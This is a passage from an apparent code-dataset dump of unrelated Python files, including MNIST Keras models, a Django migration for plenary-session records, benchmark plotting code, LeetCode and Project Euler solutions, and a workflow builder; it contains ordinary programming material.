stringifyAndJoin(perm[5:10])\n\n    # try [0:1] * [1:5]\n    operand1 = stringifyAndJoin(perm[0:1])\n    operand2 = stringifyAndJoin(perm[1:5])\n    triedProduct = operand1 * operand2\n    if triedProduct == product:\n        print('hit', product, operand1, operand2)\n        products.add(product)\n\n    # try [0:2] * [2:5]\n    operand3 = stringifyAndJoin(perm[0:2])\n    operand4 = 
stringifyAndJoin(perm[2:5])\n triedProduct2 = operand3 * operand4\n if triedProduct2 == product:\n print('hit', triedProduct2, operand3, operand4)\n products.add(product)\n\nfor prod in products:\n summed += prod\n\nprint('all perms has {} items'.format(len(allPerms)))\nprint('summed is ', summed)","sub_path":"src/euler32.py","file_name":"euler32.py","file_ext":"py","file_size_in_byte":2052,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"4095607","text":"import matplotlib.pyplot as plt\nimport numpy as np\nfrom build_dataset import build_dataset\nfrom keras_preprocessing.image import ImageDataGenerator\nfrom sklearn.model_selection import train_test_split\nfrom tensorflow.keras import Input\nfrom tensorflow.keras.layers import MaxPooling2D\nfrom tensorflow.keras.optimizers import Adam\nfrom tensorflow.python.keras.callbacks import LearningRateScheduler\nfrom tensorflow.python.keras.layers import Conv2D, Dense, Dropout, Flatten\nfrom tensorflow.python.keras.models import Sequential\nfrom tensorflow.python.keras.utils.np_utils import to_categorical\n\nx_train, y_train, x_test, y_test = build_dataset()\ny_train = to_categorical(y_train)\nx_train, x_val, y_train, y_val = train_test_split(x_train, y_train, train_size=0.8, test_size=0.2)\n\n# Dense Layers - 1, Activation - softmax\ndef model_1():\n\n model = Sequential()\n model.add(Input(shape=(28, 28, 1)))\n model.add(Flatten())\n model.add(Dense(10, activation='softmax'))\n\n return model\n\n# Dense Layers - 1, Activation - sigmoid\ndef model_2():\n\n model = Sequential()\n model.add(Input(shape=(28, 28, 1)))\n model.add(Flatten())\n model.add(Dense(10, activation='sigmoid'))\n\n return model\n\n# Dense Layers - 2, Activation - relu, sigmoid\ndef model_3():\n\n model = Sequential()\n model.add(Input(shape=(28, 28, 1)))\n model.add(Flatten())\n model.add(Dense(20, activation='relu'))\n model.add(Dense(10, activation='sigmoid'))\n\n return model\n\n# Dense Layers - 2, Activation - tanh, sigmoid\ndef model_4():\n\n model = Sequential()\n model.add(Input(shape=(28, 28, 1)))\n model.add(Flatten())\n model.add(Dense(20, activation='tanh'))\n model.add(Dense(10, activation='sigmoid'))\n\n return model\n\n# Dense Layers - 3, Activation - tanh, tanh, sigmoid\ndef model_5():\n\n model = Sequential()\n model.add(Input(shape=(28, 28, 1)))\n model.add(Flatten())\n model.add(Dense(20, activation='tanh'))\n model.add(Dense(15, activation='tanh'))\n model.add(Dense(10, activation='sigmoid'))\n\n return model\n\n# Dense Layers - 3, Activation - tanh, tanh, softmax\ndef model_6():\n\n model = Sequential()\n model.add(Input(shape=(28, 28, 1)))\n model.add(Flatten())\n model.add(Dense(20, activation='tanh'))\n model.add(Dense(10, activation='tanh'))\n model.add(Dense(10, activation='softmax'))\n\n return model\n\n# Dense Layers - 3, Activation - relu, relu, softmax\ndef model_7():\n\n model = Sequential()\n model.add(Input(shape=(28, 28, 1)))\n model.add(Flatten())\n model.add(Dense(20, activation='relu'))\n model.add(Dense(10, activation='relu'))\n model.add(Dense(10, activation='softmax'))\n\n return model\n\n# Dense Layers - 3, Activation - relu, relu, softmax\ndef model_8():\n\n model = Sequential()\n model.add(Input(shape=(28, 28, 1)))\n model.add(Flatten())\n model.add(Dense(20, activation='relu'))\n model.add(Dense(40, activation='relu'))\n model.add(Dense(10, activation='softmax'))\n\n return model\n\n# Dense Layers - 3, Activation - relu, relu, softmax\ndef model_9():\n\n model = Sequential()\n 
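# Flatten turns each 28x28x1 input into a 784-vector for the Dense stack below (50 -> 100 -> 10 units); the final softmax emits one probability per digit class\n    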
model.add(Input(shape=(28, 28, 1)))\n model.add(Flatten())\n model.add(Dense(50, activation='relu'))\n model.add(Dense(100, activation='relu'))\n model.add(Dense(10, activation='softmax'))\n\n return model\n# Dense Layers - 3, Activation - relu, relu, softmax\ndef model_10():\n\n model = Sequential()\n model.add(Input(shape=(28, 28, 1)))\n model.add(Flatten())\n model.add(Dense(50, activation='relu'))\n model.add(Dense(100, activation='relu'))\n model.add(Dense(200, activation='relu'))\n model.add(Dense(10, activation='softmax'))\n\n return model\n\n # Dense Layers - 3, Activation - relu, relu, softmax\ndef model_11():\n\n model = Sequential()\n model.add(Input(shape=(28, 28, 1)))\n model.add(Flatten())\n model.add(Dense(50, activation='relu'))\n model.add(Dense(100, activation='relu'))\n model.add(Dense(200, activation='relu'))\n model.add(Dense(400, activation='relu'))\n model.add(Dense(10, activation='softmax')) \n\n return model\n\n # Dense Layers - 3, Activation - relu, relu, softmax\ndef model_12():\n\n model = Sequential()\n model.add(Input(shape=(28, 28, 1)))\n model.add(Flatten())\n model.add(Dense(200, activation='relu'))\n model.add(Dense(300, activation='relu'))\n model.add(Dense(300, activation='relu'))\n model.add(Dense(10, activation='softmax'))\n\n return model\n\n\ndef test_model(model):\n y_pred = np.argmax(model.predict(x_test), axis=-1)\n acc = np.sum(y_pred == y_test) / np.size(y_pred)\n return acc\n\n\ndef compile_and_train_model(model, num):\n\n annealer = LearningRateScheduler(lambda x: 1e-3 * 0.9 ** x)\n model.compile(loss='categorical_crossentropy', optimizer=Adam(lr=1e-4), metrics=[\"accuracy\"])\n datagen = ImageDataGenerator(zoom_range=0.1, height_shift_range=0.1, width_shift_range=0.1, rotation_range=10)\n\n hist = model.fit_generator(datagen.flow(x_train, y_train, batch_size=16), steps_per_epoch=500, epochs=15,\n verbose=2, validation_data=(x_val, y_val), callbacks=[annealer])\n\n train_loss, train_acc = model.evaluate(x_val, y_val, verbose=0)\n\n plt.figure()\n plt.plot(hist.history['loss'], color='b', label = 'Loss')\n plt.plot(hist.history['val_loss'], color='r', label = 'Validation Loss')\n plt.xlabel('Epochs')\n plt.ylabel('Loss')\n plt.legend()\n plt.savefig(f'model_loss_{num}.png')\n plt.close()\n\n plt.figure()\n plt.plot(hist.history['accuracy'], color='b', label = 'Accuracy')\n plt.plot(hist.history['val_accuracy'], color='r', label = 'Validation Accuracy')\n plt.xlabel('Epochs')\n plt.ylabel('Accuracy')\n plt.legend()\n plt.savefig(f'model_acc_{num}.png')\n plt.close()\n\n test_acc = test_model(model)\n\n return {'train_acc': train_acc, 'train_loss': train_loss, 'test_acc': test_acc}\n","sub_path":"MNIST Detection Models/keras_models.py","file_name":"keras_models.py","file_ext":"py","file_size_in_byte":5864,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"208273662","text":"import os\nimport numpy as np\nimport pandas as pd\nfrom dl_framework.data import load_data\n\n\ndef test_create_h5_dataset():\n data_path = \"./tests/build/gaussian_sources/wo_fourier\"\n fourier = False\n\n test_ds = load_data(data_path, \"test\", fourier=fourier)\n\n img = test_ds[0][0]\n img_y = test_ds[0][1]\n\n assert img[0].shape == (63, 63)\n assert img[1].shape == (63, 63)\n assert img_y.shape == (3969,)\n\n return test_ds\n\n\ndef test_save_predictions():\n num = 3\n\n test_ds = test_create_h5_dataset()\n indices = np.random.randint(0, len(test_ds), size=num)\n\n assert len(indices) == 3\n assert 
test_ds[0][0].shape[1] == 63\n\n img_size = test_ds[0][0].shape[1]\n\n assert test_ds[0][0].view(1, 2, img_size, img_size).shape == (1, 2, 63, 63)\n assert test_ds[0][0].numpy().reshape(-1).shape == (7938,)\n assert test_ds[0][1].numpy().reshape(-1).shape == (3969,)\n\n test_imgs = [test_ds[0][0].numpy().reshape(-1), test_ds[1][1].numpy().reshape(-1)]\n build = \"tests/build/\"\n if os.path.exists(build) is False:\n os.mkdir(build)\n\n outpath = build + \"input.csv\"\n df = pd.DataFrame(data=test_imgs, index=[1, 2])\n df.to_csv(outpath, index=True)\n\n\ndef test_load_predictions():\n from gaussian_sources.inspection import open_csv\n\n path = \"tests/build/\"\n mode = \"input\"\n test_img, indices = open_csv(path, mode)\n\n assert indices[0] == 1\n assert indices[1] == 2\n assert test_img[0].shape == (7938,)\n assert test_img[1].shape == (7938,)\n","sub_path":"tests/test_visualization/test_save_load_preds.py","file_name":"test_save_load_preds.py","file_ext":"py","file_size_in_byte":1506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"652147208","text":"from Data.parameters import Data\nfrom reuse_func import GetData\n\n\nclass Diksha_page():\n def __init__(self,driver):\n self.driver = driver\n\n def test_navigation(self):\n self.data = GetData()\n count = 0\n self.driver.find_element_by_xpath(Data.hyper_link).click()\n self.data.page_loading(self.driver)\n self.driver.find_element_by_id(Data.home).click()\n self.data.page_loading(self.driver)\n self.data.navigate_to_diksha_content_course()\n self.data.page_loading(self.driver)\n if \"usage-by-course-content\" in self.driver.current_url:\n print(\"Diksha usage-by-textbook-content page is Displayed\")\n else:\n print(\"Diksha usage-by-textbook-content page is not exist \")\n count = count + 1\n self.data.page_loading(self.driver)\n return count\n\n","sub_path":"tests/src/Diksha_Reports/content_course/navigate_to_diskha_report.py","file_name":"navigate_to_diskha_report.py","file_ext":"py","file_size_in_byte":858,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"407913787","text":"from typing import List\n\n\nclass Solution:\n def spiralOrder(self, matrix: List[List[int]]) -> List[int]:\n if len(matrix) == 0:\n return []\n ans = []\n level = 0\n m, n = len(matrix), len(matrix[0])\n while level <= min((m - 1) // 2, (n - 1) // 2):\n for i in range(level, n - level):\n ans.append(matrix[level][i])\n for i in range(level + 1, m - level - 1):\n ans.append(matrix[i][n - level - 1])\n if level != m - level - 1:\n for i in range(n - level - 1, level - 1, -1):\n ans.append(matrix[m - level - 1][i])\n if level != n - level - 1:\n for i in range(m - level - 2, level, -1):\n ans.append(matrix[i][level])\n level += 1\n return ans\n\n\nif __name__ == '__main__':\n solution = Solution()\n print(solution.spiralOrder([\n [1, 2, 3],\n [4, 5, 6],\n [7, 8, 9]\n ]))\n print(solution.spiralOrder([\n [1, 2, 3, 4],\n [5, 6, 7, 8],\n [9, 10, 11, 12]\n ]))\n print(solution.spiralOrder([[3], [2]]))\n","sub_path":"pysrc/54.py","file_name":"54.py","file_ext":"py","file_size_in_byte":1141,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"263619401","text":"# -*- coding: utf-8 -*-\n\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('materia', '0001_initial'),\n ('parlamentares', '0001_initial'),\n ]\n\n operations = [\n migrations.CreateModel(\n 
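# ExpedienteMateria is an agenda item tying a MateriaLegislativa to a plenary session (its sessao_plenaria FK is attached via AddField at the bottom of this migration)\n            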
name='ExpedienteMateria',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('data_ordem', models.DateField(verbose_name='Data da Sess\\xe3o')),\n ('observacao', models.TextField(null=True, verbose_name='Ementa', blank=True)),\n ('numero_ordem', models.IntegerField(verbose_name='N\\xba Ordem')),\n ('resultado', models.TextField(null=True, blank=True)),\n ('tipo_votacao', models.IntegerField(verbose_name='Tipo de vota\\xe7\\xe3o', choices=[(1, 'Simb\\xf3lica'), (2, 'Nominal'), (3, 'Secreta')])),\n ('materia', models.ForeignKey(to='materia.MateriaLegislativa')),\n ],\n options={\n 'verbose_name': 'Mat\\xe9ria do Expediente',\n 'verbose_name_plural': 'Mat\\xe9rias do Expediente',\n },\n ),\n migrations.CreateModel(\n name='ExpedienteSessao',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('conteudo', models.TextField(null=True, verbose_name='Conte\\xfado do expediente', blank=True)),\n ],\n options={\n 'verbose_name': 'Expediente de Sess\\xe3o Plenaria',\n 'verbose_name_plural': 'Expedientes de Sess\\xe3o Plenaria',\n },\n ),\n migrations.CreateModel(\n name='IntegranteMesa',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('cargo', models.ForeignKey(to='parlamentares.CargoMesa')),\n ('parlamentar', models.ForeignKey(to='parlamentares.Parlamentar')),\n ],\n options={\n 'verbose_name': 'Participa\\xe7\\xe3o em Mesa de Sess\\xe3o Plenaria',\n 'verbose_name_plural': 'Participa\\xe7\\xf5es em Mesas de Sess\\xe3o Plenaria',\n },\n ),\n migrations.CreateModel(\n name='Orador',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('numero_ordem', models.IntegerField(verbose_name='Ordem de pronunciamento')),\n ('url_discurso', models.CharField(max_length=150, null=True, verbose_name='URL V\\xeddeo', blank=True)),\n ('parlamentar', models.ForeignKey(verbose_name='Parlamentar', to='parlamentares.Parlamentar')),\n ],\n options={\n 'verbose_name': 'Orador das Explica\\xe7\\xf5es Pessoais',\n 'verbose_name_plural': 'Oradores das Explica\\xe7\\xf5es Pessoais',\n },\n ),\n migrations.CreateModel(\n name='OradorExpediente',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('numero_ordem', models.IntegerField(verbose_name='Ordem de pronunciamento')),\n ('url_discurso', models.CharField(max_length=150, null=True, verbose_name='URL V\\xeddeo', blank=True)),\n ('parlamentar', models.ForeignKey(verbose_name='Parlamentar', to='parlamentares.Parlamentar')),\n ],\n options={\n 'verbose_name': 'Orador do Expediente',\n 'verbose_name_plural': 'Oradores do Expediente',\n },\n ),\n migrations.CreateModel(\n name='OrdemDia',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('data_ordem', models.DateField(verbose_name='Data da Sess\\xe3o')),\n ('observacao', models.TextField(null=True, verbose_name='Ementa', blank=True)),\n ('numero_ordem', models.IntegerField(verbose_name='N\\xba Ordem')),\n ('resultado', models.TextField(null=True, blank=True)),\n ('tipo_votacao', models.IntegerField(verbose_name='Tipo de vota\\xe7\\xe3o', choices=[(1, 'Simb\\xf3lica'), (2, 'Nominal'), (3, 'Secreta')])),\n ('materia', models.ForeignKey(to='materia.MateriaLegislativa')),\n ],\n options={\n 'verbose_name': 'Mat\\xe9ria da Ordem do Dia',\n 
'verbose_name_plural': 'Mat\\xe9rias da Ordem do Dia',\n },\n ),\n migrations.CreateModel(\n name='PresencaOrdemDia',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('data_ordem', models.DateField()),\n ('parlamentar', models.ForeignKey(to='parlamentares.Parlamentar')),\n ],\n options={\n 'verbose_name': 'Presen\\xe7a da Ordem do Dia',\n 'verbose_name_plural': 'Presen\\xe7as da Ordem do Dia',\n },\n ),\n migrations.CreateModel(\n name='RegistroVotacao',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('numero_votos_sim', models.IntegerField(verbose_name='Sim')),\n ('numero_votos_nao', models.IntegerField(verbose_name='N\\xe3o')),\n ('numero_abstencoes', models.IntegerField(verbose_name='Absten\\xe7\\xf5es')),\n ('observacao', models.TextField(null=True, verbose_name='Observa\\xe7\\xf5es', blank=True)),\n ('materia', models.ForeignKey(to='materia.MateriaLegislativa')),\n ('ordem', models.ForeignKey(to='sessao.OrdemDia')),\n ],\n options={\n 'verbose_name': 'Vota\\xe7\\xe3o',\n 'verbose_name_plural': 'Vota\\xe7\\xf5es',\n },\n ),\n migrations.CreateModel(\n name='SessaoPlenaria',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('cod_andamento_sessao', models.IntegerField(null=True, blank=True)),\n ('tipo_expediente', models.CharField(max_length=10)),\n ('data_inicio', models.DateField(verbose_name='Abertura')),\n ('dia', models.CharField(max_length=15)),\n ('hora_inicio', models.CharField(max_length=5, verbose_name='Hor\\xe1rio')),\n ('hora_fim', models.CharField(max_length=5, null=True, verbose_name='Hor\\xe1rio', blank=True)),\n ('numero', models.IntegerField(verbose_name='N\\xfamero')),\n ('data_fim', models.DateField(null=True, verbose_name='Encerramento', blank=True)),\n ('url_audio', models.CharField(max_length=150, null=True, verbose_name='URL Arquivo \\xc1udio (Formatos MP3 / AAC)', blank=True)),\n ('url_video', models.CharField(max_length=150, null=True, verbose_name='URL Arquivo V\\xeddeo (Formatos MP4 / FLV / WebM)', blank=True)),\n ('legislatura', models.ForeignKey(verbose_name='Legislatura', to='parlamentares.Legislatura')),\n ('sessao_legislativa', models.ForeignKey(verbose_name='Sess\\xe3o Legislativa', to='parlamentares.SessaoLegislativa')),\n ],\n options={\n 'verbose_name': 'Sess\\xe3o Plen\\xe1ria',\n 'verbose_name_plural': 'Sess\\xf5es Plen\\xe1rias',\n },\n ),\n migrations.CreateModel(\n name='SessaoPlenariaPresenca',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('data_sessao', models.DateField(null=True, blank=True)),\n ('parlamentar', models.ForeignKey(to='parlamentares.Parlamentar')),\n ('sessao_plen', models.ForeignKey(to='sessao.SessaoPlenaria')),\n ],\n options={\n 'verbose_name': 'Presen\\xe7a em Sess\\xe3o Plen\\xe1ria',\n 'verbose_name_plural': 'Presen\\xe7as em Sess\\xf5es Plen\\xe1rias',\n },\n ),\n migrations.CreateModel(\n name='TipoExpediente',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('nome', models.CharField(max_length=100, verbose_name='Tipo')),\n ],\n options={\n 'verbose_name': 'Tipo de Expediente',\n 'verbose_name_plural': 'Tipos de Expediente',\n },\n ),\n migrations.CreateModel(\n name='TipoResultadoVotacao',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, 
primary_key=True)),\n ('nome', models.CharField(max_length=100, verbose_name='Tipo')),\n ],\n options={\n 'verbose_name': 'Tipo de Resultado de Vota\\xe7\\xe3o',\n 'verbose_name_plural': 'Tipos de Resultado de Vota\\xe7\\xe3o',\n },\n ),\n migrations.CreateModel(\n name='TipoSessaoPlenaria',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('nome', models.CharField(max_length=30, verbose_name='Tipo')),\n ('quorum_minimo', models.IntegerField(verbose_name='Qu\\xf3rum m\\xednimo')),\n ],\n options={\n 'verbose_name': 'Tipo de Sess\\xe3o Plen\\xe1ria',\n 'verbose_name_plural': 'Tipos de Sess\\xe3o Plen\\xe1ria',\n },\n ),\n migrations.CreateModel(\n name='VotoParlamentar',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('voto', models.CharField(max_length=10)),\n ('parlamentar', models.ForeignKey(to='parlamentares.Parlamentar')),\n ('votacao', models.ForeignKey(to='sessao.RegistroVotacao')),\n ],\n options={\n 'verbose_name': 'Registro de Vota\\xe7\\xe3o de Parlamentar',\n 'verbose_name_plural': 'Registros de Vota\\xe7\\xf5es de Parlamentares',\n },\n ),\n migrations.AddField(\n model_name='sessaoplenaria',\n name='tipo',\n field=models.ForeignKey(verbose_name='Tipo', to='sessao.TipoSessaoPlenaria'),\n ),\n migrations.AddField(\n model_name='registrovotacao',\n name='tipo_resultado_votacao',\n field=models.ForeignKey(verbose_name='Resultado da Vota\\xe7\\xe3o', to='sessao.TipoResultadoVotacao'),\n ),\n migrations.AddField(\n model_name='presencaordemdia',\n name='sessao_plenaria',\n field=models.ForeignKey(to='sessao.SessaoPlenaria'),\n ),\n migrations.AddField(\n model_name='ordemdia',\n name='sessao_plenaria',\n field=models.ForeignKey(to='sessao.SessaoPlenaria'),\n ),\n migrations.AddField(\n model_name='oradorexpediente',\n name='sessao_plenaria',\n field=models.ForeignKey(to='sessao.SessaoPlenaria'),\n ),\n migrations.AddField(\n model_name='orador',\n name='sessao_plenaria',\n field=models.ForeignKey(to='sessao.SessaoPlenaria'),\n ),\n migrations.AddField(\n model_name='integrantemesa',\n name='sessao_plenaria',\n field=models.ForeignKey(to='sessao.SessaoPlenaria'),\n ),\n migrations.AddField(\n model_name='expedientesessao',\n name='sessao_plenaria',\n field=models.ForeignKey(to='sessao.SessaoPlenaria'),\n ),\n migrations.AddField(\n model_name='expedientesessao',\n name='tipo',\n field=models.ForeignKey(to='sessao.TipoExpediente'),\n ),\n migrations.AddField(\n model_name='expedientemateria',\n name='sessao_plenaria',\n field=models.ForeignKey(to='sessao.SessaoPlenaria'),\n ),\n ]\n","sub_path":"sessao/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":12521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"75816519","text":"from matplotlib import pyplot as plt\nfrom matplotlib import style\nimport numpy as np\n\nfrom ExecuteBenchmarks import GetDRAMThroughput\nimport jinja2\nimport os\nfrom jinja2 import Template\nlatex_jinja_env = jinja2.Environment(\n\tblock_start_string = '\\BLOCK{',\n\tblock_end_string = '}',\n\tvariable_start_string = '\\VAR{',\n\tvariable_end_string = '}',\n\tcomment_start_string = '\\#{',\n\tcomment_end_string = '}',\n\tline_statement_prefix = '%%',\n\tline_comment_prefix = '%#',\n\ttrim_blocks = True,\n\tautoescape = False,\n\tloader = jinja2.FileSystemLoader(os.path.abspath('.'))\n)\n\n# GeForce 750 Ti\nMAX_GFLOPS = 
1398\nMAX_BANDWIDTH = 86.4\n\nsystemName = \"750Ti Srv.\"\n\ndef GeneratePlot(results, job_title, output_dir = '.'):\n print(\"Processing Data...\")\n # Generate graph\n ind = []\n\n columns = {}\n\n for result in results:\n for testName in result['times']:\n time_data = result['times'][testName]\n if testName not in columns:\n columns[testName] = {}\n\n imageNumber = int(result['image'][5:7])\n if imageNumber not in columns[testName]:\n columns[testName][imageNumber] = {}\n\n columns[testName][imageNumber]['total-seq-time'] = time_data['seq']['total_time']/1e6; # ms\n columns[testName][imageNumber]['total-cuda-time'] = time_data['cuda']['total_time']/1e6; # ms\n columns[testName][imageNumber]['total-speedup'] = time_data['seq']['total_time']/time_data['cuda']['total_time'];\n\n columns[testName][imageNumber]['kernel-seq-time'] = time_data['seq']['kernel_time']/1e6; # ms\n columns[testName][imageNumber]['kernel-cuda-time'] = time_data['cuda']['kernel_time']/1e3; # us\n columns[testName][imageNumber]['kernel-speedup'] = time_data['seq']['kernel_time']/time_data['cuda']['kernel_time'];\n\n #print(\"{0:e} GFLOPS\".format(int(result['prof'][testName]['flop_count_sp']['max'])/1e9))\n #print(\"{0:e} seconds\".format(time['cuda']['kernel_time']/1e9))\n #print(\"{0:f} GFLOPS/s\".format((int(result['prof'][testName]['flop_count_sp']['max'])/1e9)/(time['cuda']['kernel_time']/1e9)))\n\n columns[testName][imageNumber]['theoretical-gflops'] = MAX_GFLOPS;\n columns[testName][imageNumber]['theoretical-bandwidth'] = MAX_BANDWIDTH;\n\n columns[testName][imageNumber]['total-mflops'] = (int(result['prof'][testName]['flop_count_sp']['max'])/1e6); # MFLOPS\n #columns[testName][imageNumber]['attained-gflops'] = (int(result['prof'][testName]['flop_count_sp']['max'])/1e9)/(time_data['cuda']['kernel_time']/1e9); # GFLOPS/s\n columns[testName][imageNumber]['reported-sp-efficiency'] = float(result['prof'][testName]['flop_sp_efficiency']['max'][:-1])\n columns[testName][imageNumber]['attained-gflops'] = MAX_GFLOPS*columns[testName][imageNumber]['reported-sp-efficiency']/100; # GFLOPS/s\n columns[testName][imageNumber]['attained-bandwidth'] = GetDRAMThroughput(result['prof'][testName],'max'); # GB/s\n\n columns[testName][imageNumber]['reported-sm-efficiency'] = float(result['prof'][testName]['sm_efficiency']['max'][:-1])\n columns[testName][imageNumber]['attained-iops'] = (int(result['prof'][testName]['inst_integer']['max'][:-1])/2e9)/(time_data['cuda']['kernel_time']/1e9); # GIOPS/s (2 because documentation says so)\n\n template = latex_jinja_env.get_template('table.tex')\n print(\"Writing Latex Tables...\")\n for testName in columns:\n table_latex = template.render(systemName=systemName,test=columns[testName],testName=testName,testNameLower=testName.lower())\n resources_dir = os.path.join(output_dir,testName.lower(),'resources')\n if not os.path.exists(resources_dir):\n os.makedirs(resources_dir)\n with open(os.path.join(resources_dir,'perf-table{0}.tex'.format(job_title)),'w') as file:\n file.write(table_latex)\n\n print(\"Generating Plot...\")\n xlabel = \"Kernel\"\n ylabel = \"Speedup\"\n title = \"Total CUDA Speedup\"\n style.use('bmh')\n\n ind = np.arange(4)\n width = 0.25\n\n\n figure, ax = plt.subplots()\n legend_items = []\n rects = []\n xticklabels = []\n prop_iter = iter(plt.rcParams['axes.prop_cycle'])\n i=0\n for result in results:\n imageNumber = int(result['image'][5:7])\n values = []\n for testName in result['times']:\n values.append(columns[testName][imageNumber]['total-speedup'])\n if testName not 
in xticklabels:\n xticklabels.append(testName)\n legend_items.append(result['image'])\n rects.append(ax.bar(ind+width*i, values, width, color=next(prop_iter)['color']))\n i += 1\n\n ax.legend(rects, legend_items)\n\n ax.set_xticklabels(xticklabels)\n ax.set_xticks(ind + width*i/2)\n ax.set_ylabel(ylabel)\n ax.set_xlabel(xlabel)\n ax.set_yscale(\"log\", nonposy='clip')\n ax.set_title(title)\n\n plt.grid(True)\n\n print(\"Saving Plot...\")\n resources_dir = os.path.join(output_dir,'conclusion','resources')\n if not os.path.exists(resources_dir):\n os.makedirs(resources_dir)\n figure.savefig(os.path.join(resources_dir,\"{0}-{1}.pdf\".format(\"total-cuda-speedup\",job_title)),format='pdf',transparent=True)\n\n print(\"Generating Plot...\")\n xlabel = \"Kernel\"\n ylabel = \"Speedup\"\n title = \"Kernel CUDA Speedup\"\n style.use('bmh')\n\n ind = np.arange(4)\n width = 0.25\n\n\n figure, ax = plt.subplots()\n legend_items = []\n rects = []\n xticklabels = []\n prop_iter = iter(plt.rcParams['axes.prop_cycle'])\n i=0\n for result in results:\n imageNumber = int(result['image'][5:7])\n values = []\n for testName in result['times']:\n values.append(columns[testName][imageNumber]['kernel-speedup'])\n if testName not in xticklabels:\n xticklabels.append(testName)\n legend_items.append(result['image'])\n rects.append(ax.bar(ind+width*i, values, width, color=next(prop_iter)['color']))\n i += 1\n\n ax.legend(rects, legend_items)\n\n ax.set_xticklabels(xticklabels)\n ax.set_xticks(ind + width*i/2)\n ax.set_ylabel(ylabel)\n ax.set_xlabel(xlabel)\n ax.set_yscale(\"log\", nonposy='clip')\n ax.set_title(title)\n\n plt.grid(True)\n\n print(\"Saving Plot...\")\n resources_dir = os.path.join(output_dir,'conclusion','resources')\n if not os.path.exists(resources_dir):\n os.makedirs(resources_dir)\n figure.savefig(os.path.join(resources_dir,\"{0}-{1}.pdf\".format(\"kernel-cuda-speedup\",job_title)),format='pdf',transparent=True)","sub_path":"src/Lab 3/Wrapper/GeneratePlots.py","file_name":"GeneratePlots.py","file_ext":"py","file_size_in_byte":6580,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"99804470","text":"from MakeOrderScreen import *\nfrom PayBillScreen import *\nfrom UpdateDetailsScreen import *\n\ndef customerScreen(customer):\n ans = \"ON\"\n while ans:\n print(\"\"\"\n Welcome back, \"\"\" + customer.getFirstName() + \"\"\"\n 1.Make an order\n 2.Pay your bill\n 3.Update your details\n 4.Back\n \"\"\")\n #stores the users input\n ans = input(\"What would you like to do? 
\")\n \n if(ans == \"1\"):\n #loads the make order screen method and passes in the customer\n makeOrderScreen(customer)\n elif(ans == \"2\"):\n #loads the pay bill screen method and passes in the customer\n payBillScreen(customer)\n elif(ans == \"3\"):\n #loads the update details screen method and passes in the customer\n updateDetailsScreen(customer)\n elif(ans == \"4\"):\n #stops the while loop which loads the previous screen method\n ans = None\n","sub_path":"CustomerScreen.py","file_name":"CustomerScreen.py","file_ext":"py","file_size_in_byte":965,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"277801842","text":"# -*- coding: utf8 -*-\n\nfrom resources import FileResource\nfrom processors import *\nfrom process import Process\nfrom tuttle.extensions.ext_csv import CSV2SQLiteProcessor\nfrom tuttle.extensions.net import DownloadProcessor, HTTPResource\nfrom tuttle.extensions.sqlite import SQLiteProcessor, SQLiteResource\nimport os\n\nclass WorkflowBuilder():\n \"\"\"A helper class to build Process classes from the name of processors and resources\"\"\"\n \n def __init__(self):\n self._resources_definition = {}\n self._processors = {}\n self.init_resources_and_processors()\n\n def init_resources_and_processors(self):\n self._resources_definition['file'] = FileResource\n self._resources_definition['http'] = HTTPResource\n self._resources_definition['sqlite'] = SQLiteResource\n self._processors['shell'] = ShellProcessor()\n self._processors['bat'] = BatProcessor()\n self._processors['download'] = DownloadProcessor()\n self._processors['sqlite'] = SQLiteProcessor()\n self._processors['csv2sqlite'] = CSV2SQLiteProcessor()\n if os.name ==\"nt\":\n self._processors['default'] = self._processors['bat']\n else:\n self._processors['default'] = self._processors['shell']\n\n def extract_scheme(self, url):\n \"\"\"Extract the scheme from an url\n url is supposed to be stripped from spaces\n \"\"\"\n separator_pos = url.find('://')\n if separator_pos == -1:\n return False\n url_scheme = url[:separator_pos]\n return url_scheme\n\n def build_resource(self, url):\n scheme = self.extract_scheme(url)\n if scheme is False or scheme not in self._resources_definition:\n return None\n ResDefClass = self._resources_definition[scheme]\n return ResDefClass(url)\n \n def build_process(self, processor, file_name, line_num):\n if processor in self._processors:\n return Process(self._processors[processor], file_name, line_num)\n else:\n return False\n\n def get_or_build_resource(self, url, resources):\n if url not in resources:\n resource = self.build_resource(url)\n resources[url] = resource\n else:\n resource = resources[url]\n return 